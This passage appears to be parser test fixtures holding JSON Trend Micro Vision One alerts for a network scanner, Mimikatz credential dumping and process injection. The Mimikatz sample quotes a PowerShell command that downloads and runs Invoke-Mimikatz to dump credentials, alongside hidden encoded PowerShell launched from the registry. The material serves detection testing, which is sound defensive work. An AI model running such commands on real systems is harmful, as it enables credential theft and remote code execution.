\"matchedDateTime\": 
\"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": 
[\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Internal Network Scanner", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509" + }, + "@timestamp": "2024-07-23T14:46:11Z", + "file": { + "directory": "C:\\Users\\doe.john\\Downloads", + "hash": { + "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + }, + "name": "Advanced_IP_Scanner_2.5.4594.1.exe", + "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" + }, + "host": { + "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", + "ip": [ + "1.2.3.4" + ], + "name": "doe10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631" + } + }, + "related": { + "hash": [ + "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "doe" + ] + }, + "rule": { + "name": "Internal Network Scanner" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": 
"Open" + } + }, + "user": { + "domain": "john", + "id": "john\\doe", + "name": "doe" + } + } + + ``` + + +=== "test_process.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", 
\"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": 
\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Credential Dumping via Mimikatz", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "parent": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x" + } + }, + "related": { + "hash": [ + 
"1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + ], + "ip": [ + "10.10.58.51" + ], + "user": [ + "sam" + ] + }, + "rule": { + "name": "Credential Dumping via Mimikatz" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00023", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "domain": "shockwave", + "id": "shockwave\\sam", + "name": "sam" + } + } + + ``` + + +=== "test_project_injection.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": 
\"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": 
\"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": 
[\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": 
\"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", 
\"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", 
\"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": 
\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": 